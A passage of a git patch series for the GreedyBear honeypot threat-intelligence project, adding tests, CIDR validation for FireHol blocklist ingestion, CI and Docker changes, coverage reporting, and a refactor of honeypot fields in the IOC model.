+        self.assertTrue(
+            WhatsMyIPDomain.objects.filter(domain=domain_name).exists()
+        )
+
+    @patch("greedybear.cronjobs.whatsmyip.requests.get")
+    def test_handle_missing_ioc_gracefully(self, mock_get):
+        """Test that missing IOC records don't cause errors"""
+        # Mock the HTTP response
+        mock_response = MagicMock()
+        mock_response.json.return_value = {"list": ["domain-with-no-ioc.com"]}
+        mock_get.return_value = mock_response
+
+        # Run the cronjob - should not raise exception
+        cron = whatsmyip.WhatsMyIPCron()
+        cron.run()
+
+        # Verify domain was added
+        self.assertTrue(
+            WhatsMyIPDomain.objects.filter(domain="domain-with-no-ioc.com").exists()
+        )
+
+    @patch("greedybear.cronjobs.whatsmyip.requests.get")
+    def test_empty_domain_list(self, mock_get):
+        """Test handling of empty domain list"""
+        # Mock the HTTP response with empty list
+        mock_response = MagicMock()
+        mock_response.json.return_value = {"list": []}
+        mock_get.return_value = mock_response
+
+        # Run the cronjob
+        cron = whatsmyip.WhatsMyIPCron()
+        cron.run()
+
+        # Verify no domains were added
+        self.assertEqual(WhatsMyIPDomain.objects.count(), 0)
+
+    @patch("greedybear.cronjobs.whatsmyip.requests.get")
+    def test_http_request_parameters(self, mock_get):
+        """Test that HTTP request is made with correct parameters"""
+        # Mock the HTTP response
+        mock_response = MagicMock()
+        mock_response.json.return_value = {"list": []}
+        mock_get.return_value = mock_response
+
+        # Run the cronjob
+        cron = whatsmyip.WhatsMyIPCron()
+        cron.run()
+
+        # Verify the request was made correctly
+        mock_get.assert_called_once()
+        call_args = mock_get.call_args
+        self.assertIn(
+            "https://raw.githubusercontent.com/MISP/misp-warninglists",
+            call_args[0][0],
+        )
+        self.assertEqual(call_args[1]["timeout"], 10)

From 47841e34c2b7963510c6de648362530d22a85418 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 20 Jan 2026 11:44:18 +0100
Subject: [PATCH 50/75] fix import order

---
 tests/greedybear/cronjobs/test_whatsmyip.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/greedybear/cronjobs/test_whatsmyip.py b/tests/greedybear/cronjobs/test_whatsmyip.py
index 51586b13..2900280a 100644
--- a/tests/greedybear/cronjobs/test_whatsmyip.py
+++ b/tests/greedybear/cronjobs/test_whatsmyip.py
@@ -1,11 +1,11 @@
 # This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
 # See the file 'LICENSE' for copying permission.
 
-from tests import CustomTestCase
-from unittest.mock import patch, MagicMock
+from unittest.mock import MagicMock, patch
 
 from greedybear.cronjobs import whatsmyip
 from greedybear.models import IOC, WhatsMyIPDomain
+from tests import CustomTestCase
 
 
 class WhatsMyIPTestCase(CustomTestCase):

From b56f70c76b7898ab70391925de88eb69f29b5705 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 20 Jan 2026 11:57:12 +0100
Subject: [PATCH 51/75] fix formatting

---
 tests/greedybear/cronjobs/test_whatsmyip.py | 32 ++++++---------------
 1 file changed, 8 insertions(+), 24 deletions(-)

diff --git a/tests/greedybear/cronjobs/test_whatsmyip.py b/tests/greedybear/cronjobs/test_whatsmyip.py
index 2900280a..7a8a3310 100644
--- a/tests/greedybear/cronjobs/test_whatsmyip.py
+++ b/tests/greedybear/cronjobs/test_whatsmyip.py
@@ -16,9 +16,7 @@ def test_add_new_domains(self, mock_get):
         """Test adding new domains from MISP warning list"""
         # Mock the HTTP response
         mock_response = MagicMock()
-        mock_response.json.return_value = {
-            "list": ["test-domain-1.com", "test-domain-2.com"]
-        }
+        mock_response.json.return_value = {"list": ["test-domain-1.com", "test-domain-2.com"]}
         mock_get.return_value = mock_response
 
         # Run the cronjob
@@ -27,12 +25,8 @@ def test_add_new_domains(self, mock_get):
 
         # Verify domains were added
         self.assertEqual(WhatsMyIPDomain.objects.count(), 2)
-        self.assertTrue(
-            WhatsMyIPDomain.objects.filter(domain="test-domain-1.com").exists()
-        )
-        self.assertTrue(
-            WhatsMyIPDomain.objects.filter(domain="test-domain-2.com").exists()
-        )
+        self.assertTrue(WhatsMyIPDomain.objects.filter(domain="test-domain-1.com").exists())
+        self.assertTrue(WhatsMyIPDomain.objects.filter(domain="test-domain-2.com").exists())
 
     @patch("greedybear.cronjobs.whatsmyip.requests.get")
     def test_skip_existing_domains(self, mock_get):
@@ -42,9 +36,7 @@ def test_skip_existing_domains(self, mock_get):
 
         # Mock the HTTP response with existing and new domains
         mock_response = MagicMock()
-        mock_response.json.return_value = {
-            "list": ["existing-domain.com", "new-domain.com"]
-        }
+        mock_response.json.return_value = {"list": ["existing-domain.com", "new-domain.com"]}
         mock_get.return_value = mock_response
 
         # Run the cronjob
@@ -53,12 +45,8 @@ def test_skip_existing_domains(self, mock_get):
 
         # Verify only new domain was added
         self.assertEqual(WhatsMyIPDomain.objects.count(), 2)
-        self.assertEqual(
-            WhatsMyIPDomain.objects.get(domain="existing-domain.com").id, existing_domain.id
-        )
-        self.assertTrue(
-            WhatsMyIPDomain.objects.filter(domain="new-domain.com").exists()
-        )
+        self.assertEqual(WhatsMyIPDomain.objects.get(domain="existing-domain.com").id, existing_domain.id)
+        self.assertTrue(WhatsMyIPDomain.objects.filter(domain="new-domain.com").exists())
 
     @patch("greedybear.cronjobs.whatsmyip.requests.get")
     def test_remove_old_ioc_records(self, mock_get):
@@ -78,9 +66,7 @@ def test_remove_old_ioc_records(self, mock_get):
 
         # Verify IOC record was deleted
         self.assertFalse(IOC.objects.filter(id=ioc.id).exists())
-        self.assertTrue(
-            WhatsMyIPDomain.objects.filter(domain=domain_name).exists()
-        )
+        self.assertTrue(WhatsMyIPDomain.objects.filter(domain=domain_name).exists())
 
     @patch("greedybear.cronjobs.whatsmyip.requests.get")
     def test_handle_missing_ioc_gracefully(self, mock_get):
@@ -95,9 +81,7 @@ def test_handle_missing_ioc_gracefully(self, mock_get):
         cron.run()
 
         # Verify domain was added
-        self.assertTrue(
-            WhatsMyIPDomain.objects.filter(domain="domain-with-no-ioc.com").exists()
-        )
+        self.assertTrue(WhatsMyIPDomain.objects.filter(domain="domain-with-no-ioc.com").exists())
 
     @patch("greedybear.cronjobs.whatsmyip.requests.get")
     def test_empty_domain_list(self, mock_get):

From 1a711e6167b4d09201500af454b325f18741b00f Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 20 Jan 2026 12:00:09 +0100
Subject: [PATCH 52/75] fix formatting

---
 tests/test_ntfy.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/tests/test_ntfy.py b/tests/test_ntfy.py
index f7f2dcd2..993a8dff 100644
--- a/tests/test_ntfy.py
+++ b/tests/test_ntfy.py
@@ -10,6 +10,7 @@
     "disable_existing_loggers": True,
 }
 
+
 @override_settings(LOGGING=TEST_LOGGING)
 class SendNtfyMessageTests(CustomTestCase):
     @override_settings(NTFY_URL="https://ntfy.sh/greedybear")

From 325e2d2e49eee429aaac5d8fefd4784ea21e980e Mon Sep 17 00:00:00 2001
From: Amisha Chhajed <136238836+amishhaa@users.noreply.github.com>
Date: Tue, 20 Jan 2026 16:33:08 +0530
Subject: [PATCH 53/75] Adding validation methods for cidr and validation for
 incoming get requests in Firehol.py. (#711)

* Adding validation methods for cidr and validation for incoming get requests in firehol

* fix merge

* fix extra import
---
 greedybear/cronjobs/extraction/utils.py   |  19 +++-
 greedybear/cronjobs/firehol.py            |   7 ++
 tests/greedybear/cronjobs/test_firehol.py |  29 ++++++
 tests/test_extraction_utils.py            | 121 ++++++++++++++++++++++
 4 files changed, 175 insertions(+), 1 deletion(-)

diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index 31de9e2d..cb421cc9 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -1,6 +1,6 @@
 from collections import defaultdict
 from datetime import datetime
-from ipaddress import IPv4Address, ip_address, ip_network
+from ipaddress import IPv4Address, IPv4Network, ip_address, ip_network
 from logging import Logger
 from urllib.parse import urlparse
 
@@ -149,6 +149,23 @@ def is_valid_ipv4(candidate: str) -> tuple[bool, str | None]:
         return False, None
 
 
+def is_valid_cidr(candidate: str) -> tuple[bool, str | None]:
+    """
+    Validate if a string is a valid CIDR notation.
+
+    Args:
+        candidate: String to validate as CIDR.
+
+    Returns:
+        True if valid CIDR, False otherwise.
+    """
+    try:
+        IPv4Network(candidate.strip(), strict=False)
+        return True, candidate.strip()
+    except ValueError:
+        return False, None
+
+
 def get_ioc_type(ioc: str) -> str:
     """
     Determine the type of an IOC based on its format.
diff --git a/greedybear/cronjobs/firehol.py b/greedybear/cronjobs/firehol.py
index db8c2bcc..b92bff41 100644
--- a/greedybear/cronjobs/firehol.py
+++ b/greedybear/cronjobs/firehol.py
@@ -1,6 +1,7 @@
 import requests
 
 from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.extraction.utils import is_valid_cidr, is_valid_ipv4
 from greedybear.cronjobs.repositories import FireHolRepository
 
 
@@ -54,6 +55,12 @@ def run(self) -> None:
                     if not line or line.startswith("#"):
                         continue
 
+                    # Validate the extracted candidate
+                    if not (is_valid_ipv4(line)[0] or is_valid_cidr(line)[0]):
+                        # Not a valid IPv4 or CIDR, log at DEBUG level
+                        self.log.debug(f"Invalid IPv4 address or CIDR in line: {line}")
+                        continue
+
                     # FireHol .ipset and .netset files contain IPs or CIDRs, one per line
                     # Comments (lines starting with #) are filtered out above
 
diff --git a/tests/greedybear/cronjobs/test_firehol.py b/tests/greedybear/cronjobs/test_firehol.py
index b4d4a314..7e00a548 100644
--- a/tests/greedybear/cronjobs/test_firehol.py
+++ b/tests/greedybear/cronjobs/test_firehol.py
@@ -133,6 +133,35 @@ def test_run_handles_raise_for_status_errors(self, mock_get):
 
         cronjob.log.error.assert_called()
 
+    @patch("greedybear.cronjobs.firehol.requests.get")
+    def test_run_handles_invalid_ip(self, mock_get):
+        # Setup mock response
+        mock_response = MagicMock()
+        mock_response.text = "# blocklist_de\n256.1.1.1\n999.999.999.999\n"
+        mock_get.return_value = mock_response
+
+        # Run the cronjob
+        cronjob = FireHolCron()
+        cronjob.log = MagicMock()
+        cronjob.execute()
+
+        self.assertFalse(FireHolList.objects.filter(ip_address="256.1.1.1", source="blocklist_de").exists())
+        self.assertFalse(FireHolList.objects.filter(ip_address="999.999.999.999", source="blocklist_de").exists())
+
+    @patch("greedybear.cronjobs.firehol.requests.get")
+    def test_run_handles_invalid_cidr(self, mock_get):
+        # Setup mock response
+        mock_response = MagicMock()
+        mock_response.text = "# blocklist_de\n192.168.1.256/24\n"
+        mock_get.return_value = mock_response
+
+        # Run the cronjob
+        cronjob = FireHolCron()
+        cronjob.log = MagicMock()
+        cronjob.execute()
+
+        self.assertFalse(FireHolList.objects.filter(ip_address="192.168.1.256", source="blocklist_de").exists())
+
     def test_cleanup_old_entries(self):
         now = datetime.now()
 
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 200794d7..7c6f56ea 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -6,6 +6,7 @@
     correct_ip_reputation,
     get_ioc_type,
     iocs_from_hits,
+    is_valid_cidr,
     is_valid_ipv4,
     is_whatsmyip_domain,
     threatfox_submission,
@@ -163,6 +164,126 @@ def test_invalid_ipv4_negative_numbers(self):
         self.assertIsNone(ip)
 
 
+class TestIsValidCIDR(CustomTestCase):
+    def test_valid_cidr_returns_true_and_cleaned_cidr(self):
+        is_valid, cidr = is_valid_cidr("192.168.1.0/24")
+        self.assertTrue(is_valid)
+        self.assertEqual(cidr, "192.168.1.0/24")
+
+    def test_valid_cidr_edge_cases(self):
+        is_valid, cidr = is_valid_cidr("0.0.0.0/0")
+        self.assertTrue(is_valid)
+        self.assertEqual(cidr, "0.0.0.0/0")
+
+        is_valid, cidr = is_valid_cidr("255.255.255.255/32")
+        self.assertTrue(is_valid)
+        self.assertEqual(cidr, "255.255.255.255/32")
+
+        is_valid, cidr = is_valid_cidr("10.0.0.0/8")
+        self.assertTrue(is_valid)
+        self.assertEqual(cidr, "10.0.0.0/8")
+
+    def test_cidr_with_whitespace_strips_and_validates(self):
+        is_valid, cidr = is_valid_cidr("  192.168.1.0/24")
+        self.assertTrue(is_valid)
+        self.assertEqual(cidr, "192.168.1.0/24")
+
+        is_valid, cidr = is_valid_cidr("192.168.1.0/24  ")
+        self.assertTrue(is_valid)
+        self.assertEqual(cidr, "192.168.1.0/24")
+
+        is_valid, cidr = is_valid_cidr("  192.168.1.0/24  ")
+        self.assertTrue(is_valid)
+        self.assertEqual(cidr, "192.168.1.0/24")
+
+    def test_invalid_cidr_out_of_range_octets(self):
+        invalid = [
+            "256.1.1.0/24",
+            "1.256.1.0/24",
+            "1.1.256.0/24",
+            "999.999.999.999/24",
+        ]
+
+        for value in invalid:
+            is_valid, cidr = is_valid_cidr(value)
+            self.assertFalse(is_valid)
+            self.assertIsNone(cidr)
+
+    def test_invalid_cidr_incomplete_format(self):
+        invalid = [
+            "192.168.1/24",
+            "192.168/24",
+            "192/24",
+            "/24",
+        ]
+
+        for value in invalid:
+            is_valid, cidr = is_valid_cidr(value)
+            self.assertFalse(is_valid)
+            self.assertIsNone(cidr)
+
+    def test_invalid_cidr_too_many_octets(self):
+        is_valid, cidr = is_valid_cidr("1.2.3.4.5/24")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+    def test_invalid_cidr_domains(self):
+        is_valid, cidr = is_valid_cidr("example.com/24")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+        is_valid, cidr = is_valid_cidr("sub.example.com/16")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+    def test_invalid_cidr_ipv6_addresses(self):
+        is_valid, cidr = is_valid_cidr("2001:db8::/32")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+        is_valid, cidr = is_valid_cidr("::1/128")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+    def test_invalid_cidr_random_strings(self):
+        is_valid, cidr = is_valid_cidr("/w00tw00t.at.ISC.SANS.DFind:)")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+        is_valid, cidr = is_valid_cidr("not a cidr")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+        is_valid, cidr = is_valid_cidr("")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+    def test_invalid_cidr_special_characters(self):
+        is_valid, cidr = is_valid_cidr("192.168.1.0/24#comment")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+        is_valid, cidr = is_valid_cidr("192.168.1.0/24 # comment")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+        is_valid, cidr = is_valid_cidr("10.0.0.0/8 some text")
+        self.assertFalse(is_valid)
+        self.assertIsNone(cidr)
+
+    def test_invalid_cidr_negative_numbers(self):
+        invalid = [
+            "-1.1.1.1/24",
+            "192.168.1.0/-1",
+            "192.168.1.0/33",
+        ]
+
+        for value in invalid:
+            is_valid, cidr = is_valid_cidr(value)
+            self.assertFalse(is_valid)
+            self.assertIsNone(cidr)
+
+
 class TestIsWhatsmyipDomain(CustomTestCase):
     def test_returns_true_for_known_domain(self):
         WhatsMyIPDomain.objects.create(domain="some.domain.com")

From ca3610919fc4c206c0d00a6b1c2b88e96c0fbea4 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 20 Jan 2026 14:35:07 +0100
Subject: [PATCH 54/75] Make CI trigger backend tests and ruff checks in PRs if
 only tests are involved

---
 .github/workflows/pull_request_automation.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/pull_request_automation.yml b/.github/workflows/pull_request_automation.yml
index 0f85421e..e6b60b06 100644
--- a/.github/workflows/pull_request_automation.yml
+++ b/.github/workflows/pull_request_automation.yml
@@ -15,7 +15,7 @@ jobs:
   detect-changes:
     uses: ./.github/workflows/_detect_changes.yml
     with:
-      backend_directories: api greedybear
+      backend_directories: api greedybear tests
       frontend_directories: frontend
       ubuntu_version: latest
 

From ab4c611158d9510bf2a0832d598d081ee3f53349 Mon Sep 17 00:00:00 2001
From: Shivraj Suman <79820642+shivraj1182@users.noreply.github.com>
Date: Wed, 21 Jan 2026 12:23:46 +0530
Subject: [PATCH 55/75] Start RabbitMQ first and make Celery wait until healthy
 (#722)

Co-authored-by: Shivraj Suman <shivraj.24bcg10030@vitbhopal.ac.in>
---
 docker/default.yml | 27 +++++++++++++++++++--------
 1 file changed, 19 insertions(+), 8 deletions(-)

diff --git a/docker/default.yml b/docker/default.yml
index 0907c88d..f38b1d31 100644
--- a/docker/default.yml
+++ b/docker/default.yml
@@ -52,6 +52,12 @@ services:
       driver: none
     depends_on:
       - postgres
+    healthcheck:
+      test: ["CMD", "rabbitmq-diagnostics", "check_running"]
+      interval: 10s
+      timeout: 5s
+      retries: 10
+      start_period: 10s
 
   celery_beat:
     image: intelowlproject/greedybear:prod
@@ -63,9 +69,12 @@ services:
     env_file:
       - env_file
     depends_on:
-      - rabbitmq
-      - postgres
-      - uwsgi
+      rabbitmq:
+        condition: service_healthy
+      postgres:
+        condition: service_started
+      uwsgi:
+        condition: service_started
     <<: *no-healthcheck
 
   celery_worker_default:
@@ -80,15 +89,17 @@ services:
     env_file:
       - env_file
     depends_on:
-      - rabbitmq
-      - postgres
-      - uwsgi
+      rabbitmq:
+        condition: service_healthy
+      postgres:
+        condition: service_started
+      uwsgi:
+        condition: service_started
     <<: *no-healthcheck
 
-
 volumes:
   postgres_data:
   nginx_logs:
   generic_logs:
   static_content:
-  mlmodels:
+  mlmodels:
\ No newline at end of file

From ac6f290aceedeff66aabc03f5591f2cb9b208ac8 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 21 Jan 2026 08:00:09 +0100
Subject: [PATCH 56/75] Bump datasketch from 1.8.0 to 1.9.0 in /requirements
 (#724)

Bumps [datasketch](https://github.com/ekzhu/datasketch) from 1.8.0 to 1.9.0.
- [Release notes](https://github.com/ekzhu/datasketch/releases)
- [Commits](https://github.com/ekzhu/datasketch/compare/v1.8.0...v1.9.0)

---
updated-dependencies:
- dependency-name: datasketch
  dependency-version: 1.9.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 7b401e32..27a45d8f 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -20,4 +20,4 @@ joblib==1.5.3
 pandas==2.3.3
 scikit-learn==1.8.0
 numpy==2.4.1
-datasketch==1.8.0
+datasketch==1.9.0

From 70ef3109c7ae3ed995f4207e10c703a6745460ce Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Wed, 21 Jan 2026 18:56:33 +0530
Subject: [PATCH 57/75] feat: Add test coverage reporting. Closes #701 (#712)

* feat: Add test coverage reporting (#701)

- Add .coveragerc configuration file
  - Define source paths (greedybear/)
  - Exclude migrations, tests, and generated files
  - Configure report formatting (show_missing, precision)
  - Set output formats for HTML and XML reports

- Update CI workflow to generate coverage artifacts
  - Generate XML coverage report for download
  - Upload coverage reports as GitHub Actions artifacts
  - Add coverage summary to job summary for quick visibility
  - Set 30-day retention for coverage artifacts

- Update .gitignore to exclude coverage artifacts
  - htmlcov/, .coverage, coverage.xml, etc.

This implements Phase 1 (Local Coverage Setup) and Phase 2 (CI Integration)
as discussed in issue #701. Coverage is already enabled in the CI workflow
and will now generate detailed reports.

Local usage:
  coverage run --source=greedybear manage.py test tests
  coverage report  # Terminal output
  coverage html    # Browser-viewable report in htmlcov/

Related: #701

* feat: Auto-install coverage in local development

- Add coverage auto-installation to local.override.yml
  - Coverage is now automatically installed when running docker compose
  - Developers no longer need to manually 'pip install coverage'

- Add requirements/test.txt for non-Docker environments
  - Provides easy installation: pip install -r requirements/test.txt
  - Documents test dependencies

This implements Option 4 as approved by @mlodic.

Related: #701

* fix: Correct regex pattern in .coveragerc

- Fixed if __name__ == __main__ pattern
- Changed from dots (.__main__.:) to proper quotes ("__main__":)
- Copilot suggestion applied

Co-authored-by: GitHub Copilot

* fix: Upload only coverage.xml artifact

- Removed .coverage file from artifact upload
- Prevents overwrites between different Python versions in matrix
- XML report is sufficient for coverage analysis
- Binary .coverage files are version-specific

Co-authored-by: GitHub Copilot

* feat: Add dev-requirements.txt with conditional Dockerfile install

Implements Option B as approved by @mlodic:

- Create requirements/dev-requirements.txt with coverage>=7.3.2
- Add INSTALL_DEV build argument to Dockerfile
- Update local.override.yml to use INSTALL_DEV=true
- Remove requirements/test.txt (replaced by dev-requirements.txt)

Benefits:
- Dependabot tracks dev dependencies automatically
- Clean separation between dev and production
- Production image stays lean (no coverage)
- Dev dependencies installed at build time, not runtime

Usage:
  docker compose up --build  # Local dev (includes coverage)
  docker build .             # Production (no dev deps)

Related: #701

* fix: Replace periods with hyphens in artifact name

- Artifact name 'coverage-report-3.13' becomes 'coverage-report-3-13'
- Prevents GitHub Actions naming conflicts with periods

Co-authored-by: GitHub Copilot

* fix: Use valid GitHub Actions expression for artifact name

* chore: Trigger CI with temporary debug log

* Revert "chore: Trigger CI with temporary debug log"

This reverts commit a7aa9412451558da8eb1b34ae2c2a4ddfd1d166f.
---
 .coveragerc                       | 32 +++++++++++++++++++++++++++++++
 .github/workflows/_python.yml     | 15 +++++++++++++++
 .gitignore                        |  6 ++++++
 docker/Dockerfile                 |  7 +++++++
 docker/local.override.yml         |  1 +
 requirements/dev-requirements.txt |  4 ++++
 6 files changed, 65 insertions(+)
 create mode 100644 .coveragerc
 create mode 100644 requirements/dev-requirements.txt

diff --git a/.coveragerc b/.coveragerc
new file mode 100644
index 00000000..8a29f2a6
--- /dev/null
+++ b/.coveragerc
@@ -0,0 +1,32 @@
+[run]
+source = greedybear
+omit = 
+    */migrations/*
+    */tests/*
+    */test_*.py
+    */__pycache__/*
+    */venv/*
+    */env/*
+    manage.py
+    greedybear/settings.py
+    greedybear/wsgi.py
+
+[report]
+show_missing = True
+precision = 2
+skip_covered = False
+skip_empty = True
+exclude_lines =
+    pragma: no cover
+    def __repr__
+    def __str__
+    raise AssertionError
+    raise NotImplementedError
+    if __name__ == "__main__":
+    @(abc\.)?abstractmethod
+
+[html]
+directory = htmlcov
+
+[xml]
+output = coverage.xml
diff --git a/.github/workflows/_python.yml b/.github/workflows/_python.yml
index 8c5c39f4..044b163c 100644
--- a/.github/workflows/_python.yml
+++ b/.github/workflows/_python.yml
@@ -543,6 +543,7 @@ jobs:
         env: ${{ secrets }}
         shell: bash
 
+
       - name: Create coverage output
         if: inputs.use_coverage && inputs.upload_coverage
         id: coverage-output
@@ -551,3 +552,17 @@ jobs:
           echo "## Coverage.py report" >> $GITHUB_STEP_SUMMARY
           echo "$(coverage report -m --format=markdown)" >> $GITHUB_STEP_SUMMARY
         working-directory: ${{ inputs.working_directory }}
+
+      - name: Generate coverage XML
+        if: inputs.use_coverage && inputs.upload_coverage
+        run: |
+          coverage xml
+        working-directory: ${{ inputs.working_directory }}
+
+      - name: Upload coverage report as artifact
+        if: inputs.use_coverage && inputs.upload_coverage
+        uses: actions/upload-artifact@v4
+        with:
+          name: coverage-report-py${{ matrix.python_version }}
+          path: ${{ inputs.working_directory }}/coverage.xml
+          retention-days: 30
diff --git a/.gitignore b/.gitignore
index 9e56261b..3d05fec9 100644
--- a/.gitignore
+++ b/.gitignore
@@ -9,4 +9,10 @@ mlmodels/
 .idea/
 # Ruff cache
 .ruff_cache/
+# Coverage reports
+htmlcov/
+.coverage
+coverage.xml
+*.cover
+.coverage.*
 
diff --git a/docker/Dockerfile b/docker/Dockerfile
index a4dee9aa..c98f60c2 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -31,9 +31,16 @@ RUN mkdir -p ${LOG_PATH} \
     && pip3 install --no-cache-dir --upgrade pip
 
 COPY requirements/project-requirements.txt $PYTHONPATH/project-requirements.txt
+COPY requirements/dev-requirements.txt $PYTHONPATH/dev-requirements.txt
 WORKDIR $PYTHONPATH
 RUN pip3 install --no-cache-dir -r $PYTHONPATH/project-requirements.txt
 
+# Conditionally install dev requirements (coverage, etc.)
+ARG INSTALL_DEV=false
+RUN if [ "$INSTALL_DEV" = "true" ]; then \
+      pip3 install --no-cache-dir -r $PYTHONPATH/dev-requirements.txt; \
+    fi
+
 COPY . $PYTHONPATH
 COPY --from=frontend-build /build /var/www/reactapp
 
diff --git a/docker/local.override.yml b/docker/local.override.yml
index 46c616c0..426b6534 100644
--- a/docker/local.override.yml
+++ b/docker/local.override.yml
@@ -5,6 +5,7 @@ services:
       dockerfile: docker/Dockerfile
       args:
         WATCHMAN: "true"
+        INSTALL_DEV: "true"
     image: intelowlproject/greedybear:test
     volumes:
       - ../:/opt/deploy/greedybear
diff --git a/requirements/dev-requirements.txt b/requirements/dev-requirements.txt
new file mode 100644
index 00000000..3cf3908d
--- /dev/null
+++ b/requirements/dev-requirements.txt
@@ -0,0 +1,4 @@
+# Development requirements
+# Installed conditionally in Docker: INSTALL_DEV=true
+# For manual installation: pip install -r requirements/dev-requirements.txt
+coverage>=7.3.2

From 7c377b283bd3009553f9bfcdedd884a9a8030567 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Thu, 22 Jan 2026 21:59:25 +0530
Subject: [PATCH 58/75] Remove hardcoded Cowrie and Log4pot fields from IOC
 model. Closes #637 (#725)

* Refactor: Remove hardcoded Cowrie and Log4j fields from IOC model

- Migrated existing data to GeneralHoneypot M2M relationship
- Removed boolean fields from IOC model
- Updated repositories and extraction strategies to use GeneralHoneypot
- Cleaned up API views and removed legacy Enums
- Updated frontend to dynamically load honeypots
- Added comprehensive tests for feed types and backward compatibility

* Fix frontend tests: update useDataTable mock

* Fix frontend linting issues in Feeds.jsx

* refactor: address review comments

- Remove legacy log4j alias and normalization logic
- Simplify queries by removing Q() wrappers
- Use list comprehensions for cleaner code
- Update tests to use log4pot instead of log4j
- Verify general_honeypot_name in extraction tests

---------

Co-authored-by: tim <46972822+regulartim@users.noreply.github.com>
---
 .github/workflows/_node.yml                   |   4 +
 api/enums.py                                  |   6 -
 api/views/statistics.py                       |  14 +-
 api/views/utils.py                            |  29 ++--
 frontend/src/components/feeds/Feeds.jsx       |   6 +-
 .../tests/components/feeds/Feeds.test.jsx     |   9 +-
 greedybear/admin.py                           |   4 -
 .../cronjobs/extraction/strategies/cowrie.py  |   9 +-
 .../cronjobs/extraction/strategies/log4pot.py |  10 +-
 greedybear/cronjobs/extraction/utils.py       |   8 +-
 greedybear/cronjobs/repositories/ioc.py       |  10 +-
 .../migrations/0030_migrate_cowrie_log4j.py   |  41 +++++
 .../0031_remove_cowrie_log4j_fields.py        |  18 ++
 greedybear/models.py                          |   2 -
 tests/__init__.py                             |  20 ++-
 tests/api/test_feed_types.py                  | 156 ++++++++++++++++++
 .../cronjobs/test_monitor_honeypots.py        |  16 +-
 tests/test_cowrie_extraction.py               |   9 +-
 tests/test_extraction_utils.py                |  25 +--
 tests/test_ioc_repository.py                  |  55 ++++--
 tests/test_models.py                          |   5 +-
 tests/test_scoring_utils.py                   |   4 +-
 tests/test_serializers.py                     |   8 +-
 tests/test_views.py                           |  33 ++--
 24 files changed, 362 insertions(+), 139 deletions(-)
 delete mode 100644 api/enums.py
 create mode 100644 greedybear/migrations/0030_migrate_cowrie_log4j.py
 create mode 100644 greedybear/migrations/0031_remove_cowrie_log4j_fields.py
 create mode 100644 tests/api/test_feed_types.py

diff --git a/.github/workflows/_node.yml b/.github/workflows/_node.yml
index 074bbe15..a164c844 100644
--- a/.github/workflows/_node.yml
+++ b/.github/workflows/_node.yml
@@ -82,6 +82,10 @@ jobs:
   node:
     name: Run node.js tests
     runs-on: ubuntu-${{ inputs.ubuntu_version }}
+    permissions:
+      actions: read
+      contents: read
+      security-events: write
     timeout-minutes: ${{ inputs.max_timeout }}
     strategy:
       matrix:
diff --git a/api/enums.py b/api/enums.py
deleted file mode 100644
index a4a536dc..00000000
--- a/api/enums.py
+++ /dev/null
@@ -1,6 +0,0 @@
-import enum
-
-
-class Honeypots(enum.Enum):
-    LOG4J = "log4j"
-    COWRIE = "cowrie"
diff --git a/api/views/statistics.py b/api/views/statistics.py
index 65eb9188..347dfa1a 100644
--- a/api/views/statistics.py
+++ b/api/views/statistics.py
@@ -80,8 +80,7 @@ def enrichment(self, request, pk=None):
     @action(detail=False, methods=["get"])
     def feeds_types(self, request):
         """
-        Retrieve statistics for different types of feeds, including Log4j, Cowrie,
-        and general honeypots.
+        Retrieve statistics for different types of feeds using GeneralHoneypot M2M relationship.
 
         Args:
             request: The incoming request object.
@@ -89,15 +88,12 @@ def feeds_types(self, request):
         Returns:
             Response: A JSON response containing the feed type statistics.
         """
-        # FEEDS
-        annotations = {
-            "Log4j": Count("name", distinct=True, filter=Q(log4j=True)),
-            "Cowrie": Count("name", distinct=True, filter=Q(cowrie=True)),
-        }
-        # feed_type for each general honeypot in the list
+        # Build annotations for each active general honeypot
+        annotations = {}
         general_honeypots = GeneralHoneypot.objects.all().filter(active=True)
         for hp in general_honeypots:
-            annotations[hp.name] = Count("name", Q(general_honeypot__name__iexact=hp.name.lower()))
+            # Use M2M relationship instead of boolean fields
